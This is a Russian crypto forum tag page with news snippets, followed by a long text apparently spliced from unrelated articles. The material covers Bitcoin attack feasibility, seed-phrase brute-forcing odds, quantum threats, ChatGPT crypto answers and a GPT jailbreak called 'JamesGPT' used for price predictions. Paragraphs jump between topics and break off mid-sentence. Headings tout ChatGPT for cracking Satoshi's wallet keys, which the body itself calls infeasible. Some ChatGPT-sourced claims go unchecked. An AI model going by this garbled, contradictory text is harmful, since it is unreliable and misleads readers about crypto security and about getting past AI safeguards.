Search the Community
Showing results for tags 'Криптография'.
-
Специалисты по безопасности крупнейшей криптовалютной биржи Binance провели однодневное обучающее мероприятие в Тайбэе для 200 сотрудников правоохранительных органов Тайваня. Команда отдела расследований и обучения правоохранительных органов Binance составила учебный план для Тайваньского бюро уголовных расследований, согласно которому полицейские рассмотрели вопросы, связанные с новыми тенденциями криптовалютной преступности, а также поделились результатами собственной практики в борьбе с киберпреступностью. «Защита пользователей является высшим приоритетом биржи Binance, а большая часть этой работы требует активного взаимодействия с правоохранительными органами по всему миру. Мы понимаем, что эффективная безопасность — это совместная работа», – объяснил руководитель отдела обучения сотрудников правоохранительных органов в Binance Ярек Якубчек (Jarek Jakubcek). На днях правовые эксперты заявили, что принудительные действия Комиссии по ценным бумагам и биржам (SEC) в отношении крупнейшей криптовалютной биржи Binance вынудят площадку перенести свои операции в Гонконг. Подробнее: https://bits.media/binance-nachala-uchit-kriptobezopasnosti-sotrudnikov-tayvanskogo-byuro-ugolovnykh-rassledovaniy/
-
- Binance
- Мероприятие
- (and 8 more)
-
Глава компании сообщил, что Ledger откладывает запуск сервиса восстановления доступа Ledger Recover до публикации открытого кода этого протокола. Паскаль Готье (Pascal Gauthier) выступил с заявлением: Ledger отказывается от спорной функции восстановления ключей после негативной реакции пользователей и приносит извинения за недопонимание, связанное с анонсированием данной разработки. Гендиректор Ledger заверил, что хотя политика компании не предполагает размещение в открытом доступе кодов всех продуктов, в отношении сервиса Ledger Recover все будет по-другому. «Наша непреднамеренная коммуникационная ошибка застала всех врасплох и повлияла на способность клиентов точно понять истинное предназначение Ledger Recover, его роль для растущего криптосообщества и будущих предложений Ledger. Мы приносим извинения за то, как это было представлено. Мы откроем исходный код протокола Ledger Recover, что позволит сообществу иметь максимально возможный выбор по сравнению с самостоятельным хранением, в дополнение к тому, что использование сервиса является полностью необязательным», – извинился Паскаль Готье. Подробнее: https://bits.media/ledger-otlozhila-zapusk-servisa-vosstanovleniya-parolya-kriptokoshelka-ledger-recover/
-
- Ledger
- Блокчейн_разработки
- (and 6 more)
-
Правительство Пакистана заявило о решении приостановить все виды доступных в стране криптовалютных услуг. Министр финансов и доходов Аиша Гаус Паша (Aisha Ghaus Pasha) в выступлении перед членами парламента заявила, что криптовалюта «никогда не будет легализована в Пакистане». Министр сообщила сенаторам, что государственным финансовым регуляторам поручено инициировать работу по запрету всех видов криптовалютных услуг. На брифинге для постоянного комитета Сената по финансам представители Министерства финансов, Государственного банка Пакистана (SBP) и Министерства информационных технологий выступили с поддержкой инициативы правительства. В комментариях для прессы сообщалось, что запрет на оборот криптовалютных активов станет важным средством борьбы с отмыванием денег и финансированием терроризма на фоне финансовой и политической нестабильности в стране. Подробнее: https://bits.media/vlasti-pakistana-gotovyatsya-k-polnomu-zapretu-kriptoaktivov/
-
- Криптовалюта
- Пакистан
- (and 7 more)
-
Биткоин является примером децентрализованной сети. Нет людей или организаций, которые контролируют его. Это часть его архитектуры. Для многих создание Bitcoin Cash под предлогом того, что блоки с большим объемом памяти были бы выгодны, рассматривается большинством членов сообщества как пример атаки на децентрализацию. зависимость от сети заинтересованной группы и ее технологий для майнинга и размещения узлов. Национальные (и даже наднациональные, такие как Европейский Союз) органы власти также стремятся к централизованному контролю. Эти политические институты иногда предназначены для запрета использования и эксплуатации Биткоинов кем-либо, кроме властей. Однако дизайн сети помешал этой альтернативе, заставив их испытать третью и самую большую опасность для Биткоина, по словам этого автора. ChatGPT стал неотъемлемым инструментом, который большинство людей ежедневно использует для автоматизации различных задач. Если вы использовали ChatGPT какое-то время, вы бы поняли, что он может давать неправильные ответы и ограничивает нулевой контекст по некоторым нишевым темам. Это поднимает вопрос о том, как мы можем подключиться к chatGPT, чтобы преодолеть разрыв и позволить ChatGPT иметь больше пользовательских данных. Огромное количество знаний распространяется на различных платформах, с которыми мы ежедневно взаимодействуем, т. е. через вики-страницы confluence на работе, слабые группы, корпоративную базу знаний, Reddit, Stack Overflow, книги, информационные бюллетени и документы Google, которыми делятся коллеги. Отслеживание всех этих источников информации само по себе является работой на полный рабочий день. Было бы неплохо, если бы вы могли выборочно выбирать источники данных и с легкостью передавать эту информацию в диалог ChatGPT с вашими данными? Существует несколько уровней безопасности Биткоин. Мы можем говорить о майнинге и потенциальных атаках 51% для реорганизации самых последних блоков, мы можем изучить шансы взломать кошелек, чтобы найти его закрытый ключ, или мы можем пойти по легкому пути и предположить рост социальных атак ( злонамеренный разработчик, вставляющий вредоносный код, или отдельные пользователи Биткоинов, которых обманом заставляют потерять свои монеты). Прежде всего, атака 51% — одна из самых больших угроз безопасности Биткоина, и она является частью схемы Proof of Work. Идея о том, что простое большинство хешрейта майнеров может действовать недобросовестно, является серьезным вектором атаки. Однако стимулы так называемого консенсуса Накамото устроены таким образом, что играть по правилам выгоднее, чем пытаться атаковать систему. Покупка и аренда оборудования для майнинга, а затем потребление большого количества электроэнергии для двойного расходования транзакций и реорганизации самых последних блоков — совсем недешевое удовольствие. При хешрейте более 360 экзахэшей в секунду даже самые изобретательные правительства и транснациональные корпорации в мире будут бороться за то, чтобы накопить 51%. Кроме того, суперкомпьютеры не оптимизированы для запуска хэшей SHA-256, как Биткоин ASIC, поэтому, если вы соберете вместе все суперкомпьютеры в мире, вы получите лишь эквивалент очень крошечного и незначительного пула майнинга. Атака 51% на Биткоин требует покупки или аренды дефицитного и узкоспециализированного оборудования, которое в настоящее время используется для защиты сети, при этом получая вознаграждение за игру по правилам. Финансовые стимулы имеют значение, и до сих пор майнеры оставались честными, сосредоточенными на своей цели и эффективно использовали энергию. Любой, кто преследует этот тип атаки на Биткоин, требует много ресурсов для его поддержания. Самый большой риск, с которым сталкивается злоумышленник, заключается в том, что честные участники сети разветвляются на новую цепочку, которая копирует набор UTXO, чтобы сохранить законное право собственности на монету. Такие усилия не дают никаких гарантий какой-либо прибыльности или успеха, что в лучшем случае может послужить политическим FUD против безопасности сети. Если финансовые стимулы останутся постоянными, мы, скорее всего, никогда не увидим серьезной атаки 51%. ChatGPT, языковой бот с искусственным интеллектом, покоривший мир, только что добавил больше огневой мощи в свой арсенал благодаря выпуску новых плагинов OpenAI. Эти плагины открывают широкий спектр сторонних источников знаний и баз данных, включая Интернет, тем самым расширяя его и без того впечатляющие функциональные возможности. Интеграция этих новых плагинов может изменить правила игры для инвесторов и трейдеров в криптоиндустрии. Однако влияние этой интеграции на криптоиндустрию еще предстоит увидеть. Влияние интернет-функциональности ChatGPT на криптовалюту Возможность ChatGPT получать доступ к Интернету в режиме реального времени может иметь серьезные последствия для инвесторов и трейдеров в криптоиндустрии, а также для рынка в целом. Имея доступ к постоянно расширяющемуся пулу информации, чат-бот может предоставлять инвесторам и трейдерам информацию о тенденциях и событиях рынка в режиме реального времени. Это означает, что пользователи могут оставаться в курсе последних новостей и аналитических материалов, что потенциально позволяет им принимать более обоснованные и выгодные решения. Даже большие пулы, состоящие из нескольких пользователей, которые объединяют свои вычислительные мощности, чтобы разделить вознаграждение, подчиняются теории игр, которая делает их честными. Под давлением правительства они могут предпочесть полностью прекратить майнинг, чтобы не атаковать сеть. Отключение майнинга вызовет сбои в оставшихся блоках цикла, но после каждых 2016 блоков (примерно 2 недели) происходит новая корректировка сложности, и всегда есть кто-то еще в другой части мира, кто хочет начать майнинг, когда закончится майнинг. шансы успешно найти правильный хеш становятся выше. Биткоин очень хорошо продуман, и есть причина, по которой эти атаки никогда не были успешными — не в первые дни, когда их было легче осуществить, Кроме того, ChatGPT утверждает, что в результате роста популярности появятся злоумышленники. Таким образом, с самого начала запуск атак 51% не должен подпадать под это описание, так как присоединение большего количества пользователей также приведет к развертыванию большего количества майнинг-ферм. Однако было важно объяснить, поскольку программное обеспечение ИИ не имеет прямого отношения к проблеме. ChatGPT — это следующая эволюция языковых моделей OpenAI, в данном случае специально настроенная для работы в качестве «чат-бота Oracle» (мое определение), который знает о абсурдно большом количестве вещей, и с которым вы можете консультироваться, задавая вопросы как естественную речь. В частности, здесь я попытался удовлетворить свое любопытство в отношении криптовалют, блокчейнов и т. д., а точнее их приложений. ChatGPT предоставил мне возможность исследовать вопросы о криптомире, которые я просто не знал, где задать. Я начал пытаться получить представление о будущем криптовалют, а затем перешел к вопросу, который меня больше всего интересует: каковы текущие и будущие приложения технологии с конкретными примерами? (В отличие от просто идеализированных приложений, которые на практике могут не реализоваться.) Ниже мои вопросы выделены жирным шрифтом, а ответы ChatGPT — в текстовом формате. Тут и там, когда я думал, что ChatGPT может что-то выдумывать, я заходил в Google и искал информацию, чтобы подтвердить или опровергнуть ответы ChatGPT. При написании этой статьи я вставил комментарии в виде цитат между своими вопросами и ответами ChatGPT. Эти комментарии, которые я сделал, иногда относятся непосредственно к «качеству» ответов ChatGPT, а иногда к переданной информации и любым фактам, которые я мог проверить или исключить после консультации в Интернете. В качестве основного аргумента в пользу флагманского цифрового актива ChatGPT назвал децентрализацию – тот факт, что ни один субъект, например, правительство или финансовое учреждение, не может контролировать его, что, в свою очередь, обеспечивает большую свободу, автономию и устойчивость к цензуре и манипуляциям. Второй причиной, ИИ выделил то, что биткоин может обеспечивать доступ к финансовым услугам для лиц, где доступа к банковским услугам нет или он затруднён, например, в регионах с неразвитой или плохой развитой банковской системой. Для того, чтобы пользоваться криптовалютой нужен только смартфон и доступ в интернет. На третьем месте стоят комиссии за транзакции в биткоинах, которые могут быть ниже «по сравнению с традиционными финансовыми услугами, особенно при совершении трансграничных транзакций». В выдаче от ChatGPT подчеркивается, что это также может снизить издержки как для физических, так и для юридических лиц, которым необходимо совершить международные переводы. Кроме того, «биткоин-транзакции записываются в публичную, устойчивую к взлому бухгалтерскую книгу, называемую блокчейн», поэтому «транзакции можно легко проверить и отследить, что снижает риск мошенничества и коррупции». Регулирование и большие криптоугрозы для Биткоина Как было сказано выше, именно здесь кроется наибольшая опасность. В мгновение ока каждая страна мира могла бы объединиться и юридически запретить обмен Биткоинов на товары или услуги. Или усложнить жизнь компаниям в секторе, которые препятствуют инициативам, отводя Биткоин только лабораториям компьютерной инженерии. В краткосрочной перспективе и фрагментарно это происходит и сегодня. Здесь, в нашем кругу влияния, благодаря США, идея не в том, чтобы создавать законы, тормозящие технологическое и экономическое развитие. Злоумышленное использование также может убедить общественность в том, что полицейская проверка будет полезной. Хотя это самая реальная опасность, на практике это не так просто. Достаточно одной стране разорвать соглашение против Биткоинов, чтобы высосать весь этот Биткоин, действуя как «криптоубежище». Мы и все, кто работает в этом секторе, должны наполнить рынок хорошими примерами использования, расширяя возможности альтернативных сообществ и экономических структур. А также развитие технологий для обеспечения более прозрачной и эгалитарной системы. Это то, чего все жаждут помимо риска. Потенциальные риски для всех криптовалют Тем не менее, существуют также потенциальные риски, связанные с этим развитием. Одним из потенциальных рисков является надежность информации, к которой обращается бот. Не вся информация, доступная в Интернете, является точной или заслуживающей доверия, и использование такой информации может привести к неверным инвестиционным решениям. Поэтому трейдеры и инвесторы должны проявлять осторожность и следить за тем, чтобы информация, которую они используют для принятия решений, поступала из надежных источников. Еще одним потенциальным риском является скорость движения рынка. Информация в режиме реального времени может быстро устареть в быстро меняющемся мире криптотрейдинга. Принятие решений на основе информации, которая больше не актуальна, может привести к значительным потерям. Во-вторых, давайте поговорим о переборе кошельков, чтобы найти приватный ключ, позволяющий хакерам украсть средства. Это, безусловно, тип уязвимости безопасности, которая теоретически должна стать более распространенной по мере того, как Биткоин получит массовое распространение. Каждый интернет-хакер должен попытаться взломать файлы кошелька, попытаться угадать действительные исходные фразы BIP39 и сгенерировать правильные парольные фразы. Удачи вам в этом — у вас больше шансов найти разумную инопланетную жизнь на далекой планете или выкопать конкретную песчинку в пустыне. Возьмем самый очевидный пример: монеты Сатоши Накамото . Легендарный миллион, описанный Серхио Демианом Лернером в его исследовательском проекте Patoshi, является высшей наградой. Нет никаких доказательств того, что эта теория о том, чем может владеть Сатоши, верна — это просто анализ, который предполагает, что Сатоши постоянно майнил. Но полученные монеты, кому бы они ни принадлежали, находятся на виду и не перемещались с 2009 года. Все знают об их существовании и могут отследить их в публичном реестре. Однако никто не может взломать закрытые ключи, чтобы заявить о своих правах на них. Чтобы представить все в цифрах, Биткоин имеет общее количество 2 256 возможных закрытых ключей и только 2 160 комбинаций адресов, которые могут существовать (при условии, что все они 160-битные). Тем не менее, перебор должен начинаться с существующего и действительного открытого ключа. Что само по себе требует дополнительных усилий. Будущее криптовалют сложно предсказать, поскольку технология и рынок все еще относительно новы и постоянно развиваются. Однако многие эксперты считают, что криптовалюты могут получить более широкое распространение и интегрироваться в основные финансовые системы. Некоторые из ключевых факторов, которые, вероятно, будут определять будущее криптовалют, включают разработку более удобных и безопасных технологий, принятие криптовалюты большим количеством предприятий и учреждений, а также регулирование рынка правительствами и другими организациями. Дефляционная, частная и программируемая в сфере искусственного интеллекта Как правильно заметил чат-бот, у биткоина ограниченная эмиссия в 21 миллион BTC, что делает его дефляционной валютой, снижая риск его инфляции, которая, как правило, «со временем подрывает покупательную способность традиционных валют». Шестой аргумент в пользу биткоина, приведенный GPT-4, – это большая степень конфиденциальности при переводе активов по сравнению с традиционными транзакциями, благодаря тому что при криптовалютных переводах используется только публичный адрес, а не конфиденциальная личная информация. На седьмом месте – ценность биткоина как инвестиции и метода диверсификации финансового портфеля, поскольку крупнейший по рыночной капитализации актив децентрализованных финансов (DeFi) продемонстрировал «потенциал значительного роста стоимости с течением времени». И последнее, но не менее важное, это тот факт, что: Будущее здесь и прогнозы ChatGPT относительно тенденций рынка Биткоинов и криптовалют Следует отметить, что для получения этих результатов Гроган использовал джейлбрейк для GPT , который он назвал JamesGPT (Just Accurate Markets Estimation System), который позволяет делать прогнозы на будущее по любой теме. Однако в то же время он задается вопросом, действительно ли такой инструмент полезен для исследователей, особенно для выявления предубеждений. На самом деле, насколько известно, такие предсказания вообще нельзя считать достоверными. Непонятно даже, как ChatGPT их формулирует. Что известно, так это то, что JamesGPT побуждает GPT «взвешивать» свои убеждения по различным темам, хотя предоставляемые результаты могут быть не однозначными и могут немного меняться в зависимости от изменений на рынках. Гроган говорит, что он задавал GPT4 один и тот же вопрос 100 раз и получил ответы, которые на самом деле вполне согласуются со стандартным отклонением менее 10 процентов. Однако остается интересным тот факт, что ChatGPT, вероятно, извлекает эти данные из Интернета или, по крайней мере, из источников, которые он считает надежными. Так что его прогнозы можно, по крайней мере, рассматривать как своего рода «консенсусное среднее» источников, которые он считает авторитетными. Самые важные риски и развитие искусственного интеллекта Есть несколько рисков, связанных с Биткоинами, которые могут повлиять на его ценность и принятие. Вот некоторые из наиболее значительных: Регулирование: правительства и финансовые органы по всему миру все еще выясняют, как регулировать Биткоин и другие криптовалюты. Слишком строгие или враждебные по отношению к Биткоину правила могут привести к снижению его принятия и использования, а слишком мягкие правила могут привести к росту мошенничества и мошенничества. Безопасность: Биткоин основан на децентрализованной системе, которая опирается на сложные алгоритмы и криптографию для обеспечения безопасности. Однако система не безотказна и были случаи взлома и кражи бирж и кошельков. Волатильность: цена Биткоина была очень волатильной, с большими колебаниями вверх и вниз в течение коротких периодов времени. Это делает его рискованным вложением для некоторых и может затруднить его использование в качестве надежного средства обмена. Принятие: несмотря на то, что за последнее десятилетие Биткоин значительно вырос, он по-прежнему сталкивается с проблемами, связанными с более широким использованием и признанием. Многие продавцы по-прежнему не принимают Биткоин в качестве формы оплаты, и все еще существуют значительные барьеры для людей, которые хотят покупать и использовать Биткоин. Конкуренция: Биткоин — не единственная криптовалюта на рынке. Существуют тысячи других криптовалют с различными функциями и вариантами использования, которые могут бросить вызов доминированию Биткоина. Может ли GhatGPT ускорить в поиске приватного ключа для потерянных Биткоин Кошельков от Сатоши Накомото. Поиски приватного ключа для потерянных Биткоин Кошельков от Сатоши Накомото на миллиарды долларов США не дают покоя и посей день, способ перебора кошельков заключается в попытке найти один из 296 закрытых ключей, которые сталкиваются с одним и тем же адресом. Количество возможных вариантов составляет 79 228 162 514 264 337 593 543 950 335 — примерно в 79 228 раз больше, чем предполагаемое количество звезд во Вселенной. С другой стороны, если вы хотите взломать конкретный кошелек (например, кошелек Сатоши), вы должны иметь дело со всеми 2 256 комбинациями закрытых ключей. Предполагая, что вы обладаете вычислительной мощностью, позволяющей пробовать 1000 триллионов ключей в секунду, перебор любого ключа займет у вас время, равное 2,7 × 10 44 × возрасту Вселенной (как указано выше) .разработчиком Raghav Sood на Bitcoin StackExchange). Это число превышает все, что может быть измерено человеком, включая количество атомов, окружающих наблюдаемый нами мир. Что касается сид-фраз BIP39, то здесь 2048 слов и 12/24 их комбинаций. Для удобства предположим, что это базовая установка из 12 слов. Чтобы угадать случайное, у вас есть 2048 12 (или 2 132 ) возможностей. По словам модератора Reddit BashCo, это число равно 1 из 115 кваттюорвигинтиллион 792 тревигинтиллион 89 дуовигинтиллион 237 унвигинтиллион 316 вигинтиллион 195 новемдециллион 423 октодециллион 570 септендециллион 985 сексдециллион 8 квиндециллион 687 кваттюордециллион 907 тредециллион 853 дуодециллион 269 ундециллион 984 дециллион 665 нониллион 640 октиллион 564 септиллион 39 секстиллион 457 квинтиллион 584 квадриллион 7 триллионов 913 миллиардов 129 миллионов 639 тысяч 936. Если вы уверены, что одно из 2048 слов должно быть первым, то ваши шансы превращаются в 2048 11 , потому что в BIP39 слова могут повторяться в одной и той же настройке. И если у вас есть первые 10 слов в правильном порядке, а вам нужны только 11-е и 12-е, у вас есть только 2048 2 возможностей, что уже сегодня делает его перебором с помощью обычного компьютерного процессора. Так что позаботьтесь о своей исходной фразе и, если вам удобно, добавьте поверх нее парольную фразу из-за пределов словаря BIP39. Это значительно повысит вашу безопасность, но может стать проблемой только в том случае, если вы забудете или потеряете парольную фразу. Но в целом, как отметили Питер Тодд и один из создателей BIP39 Павол «Стик» Руснак, это очень непрактично и сродни утверждению, что на футбольном поле можно припарковать 500 автомобилей. Предложение Питера состояло в том, чтобы полностью удалить его, так как эффективный способ атаки на начальные фразы BIP39 — это перебор сгенерированного закрытого ключа. Существует множество различных приложений для криптовалют и лежащей в их основе технологии блокчейна. Некоторые из наиболее распространенных применений включают в себя: Цифровые валюты: наиболее известное использование криптовалюты — это цифровая валюта, которую можно использовать для совершения покупок или передачи стоимости между отдельными лицами. Самая известная криптовалюта — Биткоин, но есть и многие другие, такие как Ethereum и Litecoin, которые также используются для этой цели. Смарт-контракты. Технология блокчейн может использоваться для создания «умных контрактов», которые автоматически выполняют условия соглашения между двумя сторонами. Например, смарт-контракт можно использовать для автоматической передачи права собственности на часть собственности от одного человека к другому при соблюдении определенных условий. Отслеживание цепочки поставок: технологию блокчейн можно использовать для отслеживания движения товаров по цепочке поставок, обеспечивая прозрачность и подотчетность. Например, пищевая компания может использовать блокчейн для отслеживания происхождения и перемещения ингредиентов, что позволит им гарантировать качество и безопасность своей продукции. Управление идентификацией: технологию блокчейн можно использовать для создания безопасных децентрализованных систем для хранения и проверки личной идентификационной информации. Это можно использовать для создания более безопасных и эффективных систем для голосования, социальных сетей и других приложений. Это всего лишь несколько примеров множества возможных применений криптовалют и лежащей в их основе технологии блокчейна. Поскольку технология продолжает развиваться, вероятно, будут разработаны новые и инновационные способы ее использования. Прогнозы ChatGPT по цене Биткоинов На самом деле, чтобы правильно интерпретировать ответ ChatGPT относительно взрыва Биткоина в следующие 12 лет, нужно учитывать не столько то, что он предсказывает 15-процентную вероятность этого, сколько то, что он на самом деле считает это невозможным на 85 процентов. Вот почему, по словам Грогана, GPT является большим поклонником Биткоинов. Надо сказать, что такая низкая оценочная вероятность провала Биткоина в среднесрочной/долгосрочной перспективе довольно распространена, особенно среди Биткоинеров, хотя для максималистов она, вероятно, даже ниже, если не близка к нулю. Таким образом, ChatGPT не является Биткоин-максималистом, но, похоже, имеет те же «идеи», что и Биткоинеры. В свете приведенных выше соображений относительно метода, с помощью которого ChatGPT делает эти прогнозы, кажется, есть два объяснения этой линии рассуждений. Либо ChatGPT включает в себя в первую очередь Биткоинеров среди источников, считающихся авторитетными в отношении Биткоинов, либо, действительно, к настоящему времени даже в мире основных финансов гипотеза о реальном взрыве Биткоинов считается маргинальной. Дело в том, что другие подобные инициативы дали аналогичные результаты, т. е. в настоящее время среди экспертов широко распространено мнение о том, что Биткоин вряд ли рухнет в течение десятилетия или около того. Следовательно, широко распространенный консенсус, вероятно, заключается именно в довольно низкой вероятности имплозии, хотя ни в коем случае не несуществующей. Квантовые вычисления + ChatGPT для поиска приватного ключа для потерянных Биткоин Кошельков от Сатоши Накомото. Да, квантовые вычисления могут стать угрозой в будущем. Но это будущее очень далеко: по состоянию на март 2023 года самым мощным квантовым компьютером в мире является IBM Osprey — машина, которая рекламирует 433 физических кубита. Как указано в исследовательской статье 2022 года, опубликованной в журнале AVS Quantum Science, для компьютера, который стремится взломать криптографию с открытым ключом на основе эллиптической кривой Биткоина в течение 24 часов, требуется 13 × 10 6 кубитов. Другими словами, квантовые компьютеры должны стать в тысячи раз более мощными, чтобы взломать Биткоин. Пока технологический скачок в квантовых вычислениях немного превышает закон Мура. В целях прогнозирования давайте воспользуемся этой моделью, предположив, что закономерность сохраняется и количество кубитов продолжает удваиваться каждые 2 года. Чтобы перейти с 433 на 13 × 10 6 , квантовые компьютеры должны стать в 30023 раза мощнее. Это по крайней мере еще 20 лет, прежде чем мы должны серьезно начать беспокоиться. Потребовалось 24 года исследований и разработок, чтобы перейти от 2 кубитов к 433 кубитам. Как скоро мы достигнем 10000 кубитов? Наверное, еще несколько десятков лет. При 10000 кубитах и некоторых очень специфических физических условиях (время цикла кода 1 мкс , время реакции 10 мкс и физическая ошибка вентиля 10^−3) квантовый компьютер сможет украсть монеты из произвольный Биткоин-кошелек за 10 дней. Однако к тому времени криптография также значительно улучшится, и Биткоин может перейти к лучшей модели, которая делает грубую силу настолько сложной, что квантовым компьютерам потребуется гораздо больше времени, чтобы наверстать упущенное. Для перехода на квантово-устойчивые ключи требуется только программный форк, который может быть активирован большинством узлов или майнеров. Так что вся эта дискуссия может оказаться просто бумажным тигром или недостойным FUD. Теперь, когда мы избавились от этих двух очень сложных и чрезвычайно дорогих атак, пришло время сосредоточиться на наиболее вероятных из них: социальных атаках. В Биткоинах мы любим говорить «не доверяй, проверяй». Однако создание систем доверия, которые устраняют сомнения в потенциальной злонамеренности разработчиков, является одним из очень серьезных векторов атаки. Финансовые услуги в ChatGPT как виртуальный ассистент. вот еще несколько конкретных примеров того, как криптовалюты и лежащие в их основе технологии блокчейна используются в реальном мире: Финансовые услуги. Многие финансовые учреждения изучают возможности использования криптовалют и технологии блокчейн для повышения эффективности и безопасности своих услуг. Например, Банк Канады экспериментирует с основанной на блокчейне системой межбанковских расчетов, а Народный банк Китая разрабатывает собственную цифровую валюту. Розничные платежи: несколько розничных продавцов, в том числе Starbucks и Whole Foods, теперь принимают Биткоины и другие криптовалюты в качестве оплаты за товары и услуги. Это позволяет клиентам использовать свои цифровые валюты так же, как наличные деньги или кредитную карту. Благотворительность и филантропия. Криптовалюты и технология блокчейна используются благотворительными и некоммерческими организациями для повышения прозрачности и эффективности их усилий по сбору средств. Например, Всемирная продовольственная программа ООН использовала технологию блокчейн для оказания продовольственной помощи сирийским беженцам. Государственные услуги: некоторые правительства изучают использование технологии блокчейн для различных приложений государственного сектора, включая регистрацию земли, голосование и управление идентификацией. Например, город Москва использует систему на основе блокчейна для отслеживания прав собственности и предотвращения мошенничества. Это всего лишь несколько примеров того, как криптовалюты и лежащие в их основе технологии блокчейна используются в реальном мире. Поскольку технология продолжает развиваться, вполне вероятно, что будет разрабатываться все больше и больше приложений. Для Биткоина это будет означать цену ниже 0,3 доллара, уровень, который был пересечен в 2010 году, в первый год торгов на биржах, и с тех пор ни разу не был затронут. Другими словами, это будет означать возвращение к своей первоначальной неуместности. Для Ethereum это будет означать падение до 0,018 доллара, уровня, на котором он никогда не был, и который будет намного ниже, чем даже 0,4 доллара в 2015 году. Таким образом, хотя, похоже, нет единого мнения о возможном крахе Биткоина в течение следующих десяти лет, и не намного больше об эфириуме, что касается альткойнов, аргумент другой. Однако следует подчеркнуть, что на самом деле нет уверенности в том, что прогнозы ChatGPT действительно отражают истинный консенсус аналитиков, считающихся авторитетными, и, кроме того, эти прогнозы могут легко меняться со временем. Однако один из способов попытаться понять, насколько они надежны, — это попросить его предсказать движение цен в краткосрочной или, что еще лучше, в среднесрочной перспективе, чтобы через несколько месяцев или, самое большее, несколько лет , тогда мы сможем увидеть, насколько надежными на самом деле окажутся его предсказания. ChatGPT в ближайшее будущее изменит процесс программирование и CODING Как мы писали ранее для поиска приватного ключа для потерянных Биткоин Кошельков от Сатоши Накомото программисты всего мира изобретают велосипед, эта гонка изменит привычное программирование. ChatGPT как реактивный самолет в ближайшее будущее изменит все стандарты в программирование. Самый простой способ смягчить любой вид атаки — оставаться консервативным в отношении кода: не обновляться до последней версии, если вы заранее не проверите ее или не заплатите кому-то другому, чтобы он сделал это за вас. И если вы не делаете ни того, ни другого, по крайней мере, убедитесь, что достаточное количество людей с враждебными стимулами проверили новый код. Когда ставки настолько высоки, что глобальная финансовая система находится под угрозой, можно с уверенностью предположить, что разработчики находятся под большим давлением и могут совершать ошибки или быть скомпрометированы. Однако это не аргумент в пользу окостенения: Биткоин как проект еще не завершен, и доработки все еще необходимы. От повышения конфиденциальности до уменьшения размера транзакций и обеспечения защиты от атак квантовых вычислений — еще многое предстоит сделать. Мой аргумент против безрассудства с непроверенной технологией, последствия которой не совсем понятны, но не против инноваций. Тем не менее, стремясь к инновациям, мы не должны отказываться от проверки в пользу срочности. Как сообщество, мы должны поощрять разработчиков Биткоинов к подготовке вариантов до того, как угроза станет неизбежной: модели для квантово-устойчивой криптографии на основе эллиптических кривых, масштабируемая конфиденциальность и так далее. Некоторые из этих решений уже тестируются с помощью рыночных стимулов в других сетях — важнее всего то, что разработчики Биткоинов обращают внимание на законные технологические усовершенствования, совершенствуют то, что уже есть, и выдвигают предложения, которые все должны обсудить. Кроме того, мы никогда не должны пренебрегать нашими ролями независимых операторов узлов и майнеров — именно мы выбираем, какой код запускать, а Биткоин-клиенты могут работать с некоторыми минималистичными спецификациями. Не все, что было добавлено в Core, необходимо, И последнее, но не менее важное: мы должны поговорить о безопасности каждого отдельного пользователя Биткоин. Это, скорее всего, основной тип FUD, который выразил ChatGPT, когда он упомянул хакеров и злоумышленников. Что-либо между кейлоггерами, которые регистрируют и транслируют ввод с клавиатуры вашего компьютера (который может содержать ваши кодовые фразы Bitcoin Core или сид-фразу BIP39) до мошеннических действий по сходству и физических атак, становится все более вероятным по мере роста цены BTC. Да, есть много других интересных приложений для криптовалют и технологии блокчейна, помимо индустрии цифровой рекламы. Вот некоторые другие примеры использования этой технологии: Управление цепочками поставок. Технология блокчейн используется компаниями для повышения прозрачности и эффективности операций в цепочках поставок. Например, Walmart использует систему на основе блокчейна для отслеживания движения свинины в Китае, а Maersk использует аналогичную систему для отслеживания движения транспортных контейнеров. Управление идентификацией: технология Blockchain используется для создания децентрализованных систем для хранения и проверки личной идентификационной информации. Например, правительство Эстонии использует систему на основе блокчейна для управления медицинскими картами своих граждан. Торговля энергией: технология блокчейн используется для создания более эффективных и прозрачных систем торговли энергией. Например, стартап LO3 Energy использует платформу на основе блокчейна, чтобы жители Бруклина, штат Нью-Йорк, могли покупать и продавать возобновляемую энергию друг у друга. Голосование: технология блокчейн изучается как способ повысить безопасность и прозрачность систем голосования. Например, в 2018 году канцелярия госсекретаря Западной Вирджинии провела пилотную программу, в которой использовалась система на основе блокчейна для голосования на первичных выборах в штате. Это всего лишь несколько примеров из множества возможных применений криптовалют и технологии блокчейн. Поскольку технологии продолжают развиваться, вполне вероятно, что будут разрабатываться все более и более инновационные способы их использования. Плохая новость заключается в том, что ни один разработчик, изменение протокола, правительственная или неправительственная организация не могут защитить вас от ошибок. Хорошей новостью является то, что есть некоторые общие рекомендации, которым вы можете следовать, чтобы повысить свою безопасность. Они включают: – использование выделенного устройства для подписи и трансляции Биткоин-транзакций (ноутбук или телефон с Linux, на котором во время использования запущено программное обеспечение полного узла Биткоин, аппаратные кошельки BIP39 с надежными парольными фразами); – создание сетапов, исключающих единые точки отказа (multisig и резервные копии SLIP39 Shamir); — использование холодного хранения ( металлические пластины , бумажные кошельки, физические Биткоины); – защитить себя за счет хорошей операционной безопасности и конфиденциальности (не раскрывайте случайным незнакомцам, где вы живете, какова ваша настройка Биткоинов и сколько у вас денег – это также включает в себя жизнь в материальном плане нормальной жизнью для вашего района/сообщества без показухи ). Помните: раскрывайте как можно меньше информации о своей Биткоин-активности или, по крайней мере, вводите своих шпионов в заблуждение, чтобы у них было искаженное представление о том, чем вы на самом деле занимаетесь и насколько вы богаты. Биткоин — это валюта, обеспечивающая абсолютную собственность. Это означает, что после того, как транзакция была передана и подтверждена в блоке, она стала необратимой. Таким образом, каждый пользователь несет ответственность за защиту своего богатства в меру своих знаний и возможностей в соответствии с моделью реальной угрозы. Прежде чем создавать какие-либо настройки, вы должны спросить себя: «Кто является самым опасным противником, который, вероятно, попытается украсть мои монеты?». Если вы делитесь компьютером с другими людьми, вам не следует оставлять незашифрованные файлы кошелька. Если вы путешествуете, то не стоит носить с собой устройства, которые показывают, что вы носите Биткоины (обычно аппаратный кошелек легче распознать и он вызывает больше подозрений, чем ноутбук или лист бумаги). Если у вас есть дети или любопытный супруг, который может вмешиваться в ваши картотечные шкафы и ящики, то лучше не держать резервную копию в пределах досягаемости. Если вы живете в плохом районе с высоким уровнем преступности, вам, вероятно, следует избегать хранения резервных копий Биткоинов в вашем доме. А если вашему району угрожают наводнения, пожары, извержения вулканов или землетрясения, Однако наиболее распространенной угрозой являются интернет-хакеры. Вы можете найти этих преступников в виде лиц, которые незаконно пытаются взломать ваш компьютер, а также бизнесменов в костюмах, которые разрабатывают системы, которые по сути крадут ваши монеты в рамках закона. Из первой категории вы можете выделить людей, которые 